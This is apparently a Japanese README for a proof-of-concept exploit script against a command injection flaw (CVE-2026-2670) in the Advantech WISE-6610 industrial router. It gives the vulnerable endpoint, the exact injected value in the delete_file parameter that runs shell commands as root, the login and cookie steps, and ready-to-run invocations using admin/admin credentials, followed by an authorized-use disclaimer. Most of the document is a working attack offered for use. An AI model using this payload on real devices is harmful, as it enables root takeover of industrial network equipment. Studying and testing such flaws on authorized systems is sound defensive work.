
CVE-2026-2670の概念実証エクスプロイト。Advantech WISE-6610ルーターにおけるコマンドインジェクションの脆弱性で、認証済みの攻撃者がroot権限で任意のコマンドを実行できるようにします。
Advantech WISE-6610 産業用セルラールーターにおけるコマンドインジェクション脆弱性を実証する概念実証エクスプロイトです。
この脆弱性は /cgi-bin/luci/admin/openvpn_apply エンドポイントに存在し、認証済み攻撃者が任意のシステムコマンドを実行できるようになります。
WISE-6610 の Web インターフェースは、OpenVPN 設定の削除処理時に delete_file パラメータを適切にサニタイズしません。
有効な認証情報を持つ攻撃者は、パイプ(|)に続けてコマンドと終端用の echo$(IFS) シーケンスを使用することで、入力フィルタをバイパスしてシェルコマンドを注入できます。
注入されたコマンドはroot権限で実行されます。
requests ライブラリ依存関係のインストール:
pip install requests
オプション 説明
--target デバイスのベースURL(例: http://192.168.1.100:8444)
--cmd 実行するコマンド。出力をWebルート内のファイルに書き込む必要があります(例: id > output.txt)
--output 出力ファイルへのWebパス(例: /output.txt)。--cmd で使用したファイル名と一致させる必要があります
--cookie (任意)既存の sysauth セッションクッキー値
--username (任意)ログイン用ユーザー名
--password (任意)ログイン用パスワード
--delay 出力を取得するまでの待機秒数(デフォルト: 2)
--debug 詳細なリクエスト/レスポンスログを有効化
このスクリプトは2つの認証方法をサポートしています:
既存の sysauth セッションクッキーを提供する
ユーザー名とパスワードでログインする
基本構文
python3 exploit.py --target <URL> --cmd <COMMAND> --output <OUTPUT_PATH> \
[--cookie <SYSCOOKIE> | --username <USER> --password <PASS>] \
[--delay <SECONDS>] [--debug]
1️⃣ 事前認証済みクッキーを使用する場合
python3 exploit.py \
--target http://192.168.1.100:8444 \
--cmd 'id > output.txt' \
--cookie f417ce7d2d576017ff5fd81d7d5f555f \
--output /output.txt
2️⃣ 認証情報でログインする場合
python3 exploit.py \
--target http://192.168.1.100:8444 \
--cmd 'echo "pwned" > output.txt' \
--username admin \
--password admin \
--output /output.txt
3️⃣ デバッグ出力付き
python3 exploit.py \
--target http://192.168.1.100:8444 \
--cmd 'uname -a > output.txt' \
--username admin \
--password admin \
--output /output.txt \
--debug
認証に必要な luci_nonce クッキーを取得するため、/cgi-bin/luci/ に GET リクエストが送信されます。
認証情報が提供された場合、スクリプトは luci_username と luci_password を使用して /cgi-bin/luci/ に POST リクエストを送信し、sysauth クッキーを取得します。
--cookie で有効なクッキーが指定された場合、この手順はスキップされます。
以下のエンドポイントに POST リクエストが送信されます:
/cgi-bin/luci/admin/openvpn_apply
以下のパラメータが使用されます:
act=delete
delete_file=123123|<command> echo$(IFS)
openvpn_id=1
echo$(IFS) シーケンスは、注入されたコマンドを終了させ、入力フィルタをバイパスするのに役立ちます。
短い待機時間の後、スクリプトは指定された --output パスから生成されたファイルの取得を試みます。
このツールは教育目的および許可されたセキュリティテスト専用に提供されています。
所有していないシステム、または明示的なテスト許可がないシステムに対する不正使用は違法です。
著者は、このソフトウェアの誤用または損害について一切の責任を負いません。